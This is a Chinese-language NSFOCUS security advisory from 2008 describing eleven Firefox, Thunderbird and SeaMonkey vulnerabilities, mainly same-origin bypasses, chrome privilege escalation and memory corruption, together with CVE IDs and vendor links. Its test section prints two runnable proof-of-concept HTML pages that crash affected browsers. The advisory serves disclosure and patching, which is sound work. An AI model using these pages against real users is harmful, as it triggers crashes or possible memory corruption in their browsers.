绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

Mozilla Firefox 2.0.0.18和3.0.4版本修复多个安全漏洞

发布日期：2008-11-13
更新日期：2008-11-14

受影响系统：

Mozilla Firefox < 3.0.4
Mozilla Firefox < 2.0.0.18
Mozilla Thunderbird < 3.0.4
Mozilla Thunderbird < 2.0.0.18
Mozilla SeaMonkey < 1.1.13

不受影响系统：

Mozilla Firefox 3.0.4
Mozilla Firefox 2.0.0.18
Mozilla Thunderbird 3.0.4
Mozilla Thunderbird 2.0.0.18
Mozilla SeaMonkey 1.1.13

描述：

BUGTRAQ  ID: 32281,32351
CVE(CAN) ID: CVE-2008-5012,CVE-2008-5013,CVE-2008-5014,CVE-2008-5016,CVE-2008-5017,CVE-2008-5018,CVE-2008-5019,CVE-2008-5021,CVE-2008-5022,CVE-2008-5023,CVE-2008-5024,CVE-2008-5015,CVE-2008-0017

Firefox是Mozilla所发布的开源WEB浏览器。

Firefox中的多个安全漏洞允许恶意用户泄露敏感信息、绕过安全限制、执行欺骗攻击或入侵用户系统。由于代码共享，Thunderbird和SeaMonkey也受这些漏洞的影响。

1) 攻击者可能结合HTTP重新定向利用画布单元绕过同源限制访问其他域中任意图形的内容。如果受害用户登录的站点在图形中存储了数据的话，攻击者就可以窃取敏感信息。

2) 由于没有充分地检查是否正确地动态上传了Flash模块，从外部JavaScript函数动态上传其自身的SWF文件可能导致浏览器访问已不再映射到Flash模块的内存地址，造成拒绝服务。

3) 通过篡改window.__proto__.__proto__对象，攻击者就可以导致浏览器锁定非原始对象，造成崩溃。

4) 在与chrome页面或特权的about:页面相同标签页中打开file: URI时，就会给予其chrome权限，这允许攻击者以chrome权限执行任意JavaScript。

5) Firefox和其他Mozilla产品的浏览器引擎中存在多个BUG，其中的一些BUG在某些情况下可能导致内存破坏。

6) 浏览器重置功能可能导致破坏同源策略，以其他站点的环境执行JavaScript。

7) Mozilla解析http-index-format MIME类型的方式存在漏洞，远程攻击者可以在HTTP索引响应中发送特制的200头导致浏览器崩溃或在用户机器上执行任意代码。

8) Mozilla的DOM创建代码中存在漏洞，通过在完成初始化之前修改文件输入单元的某些属性，就可以利用这个漏洞。在调用修改后输入单元的blur方式的时候，浏览器就会访问未初始化的内存，导致崩溃。

9) 攻击者可以绕过nsXMLHttpRequest::NotifyEventListeners()中的同源检查，导致以其他站点的环境执行JavaScript。

10) -moz-binding CSS属性中的漏洞可能允许绕过安全检查，攻击者可以通过使用相对路径的签名JAR替换样式表，然后使用-moz-binding属性向JAR中注入恶意脚本，注入的脚本会以签名JAR的权限执行。

11) 由于没有正确地转义名称空间中的引号字符，用于解析E4X文档中默认名称空间的方式存在错误。

<*来源：Chris Evans （chris@ferret.lmh.ox.ac.uk）
        moz_bug_r_a4 （moz_bug_r_a4@yahoo.com）
        Georgi Guninski （guninski@guninski.com）
        Collin Jackson （collinj@cs.stanford.edu）

  链接：http://secunia.com/advisories/32713/
        http://secunia.com/advisories/32693/
        http://www.mozilla.org/security/announce/2008/mfsa2008-48.html
        http://www.mozilla.org/security/announce/2008/mfsa2008-49.html
        http://www.mozilla.org/security/announce/2008/mfsa2008-50.html
        http://www.mozilla.org/security/announce/2008/mfsa2008-51.html
        http://www.mozilla.org/security/announce/2008/mfsa2008-52.html
        http://www.mozilla.org/security/announce/2008/mfsa2008-53.html
        http://www.mozilla.org/security/announce/2008/mfsa2008-54.html
        http://www.mozilla.org/security/announce/2008/mfsa2008-55.html
        http://www.mozilla.org/security/announce/2008/mfsa2008-56.html
        http://www.mozilla.org/security/announce/2008/mfsa2008-57.html
        http://www.mozilla.org/security/announce/2008/mfsa2008-58.html
        https://www.redhat.com/support/errata/RHSA-2008-0978.html
        https://www.redhat.com/support/errata/RHSA-2008-0977.html
        http://www.debian.org/security/2008/dsa-1669
        https://www.redhat.com/support/errata/RHSA-2008-0976.html
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
<script type="text/javascript">

window.__proto__.__proto__ = [{}];
for (var j in window);

</script>
</head>
<body>
</body>
</html>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html;
charset=utf-8">
        <title>wushi0016</title>
        <script type='text/javascript'>
            function goodbye() {
                nodeList = document.getElementsByTagName("input");
                testNode = nodeList.item(0);
                testNode.type = "yabba-dabba-do";
                return testNode.blur();
            }
        </script>
    </head>
    <body onload="goodbye()">
        <input type="file" />
    </body>
</html>

https://bugzilla.mozilla.org/attachment.cgi?id=333792

建议：

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客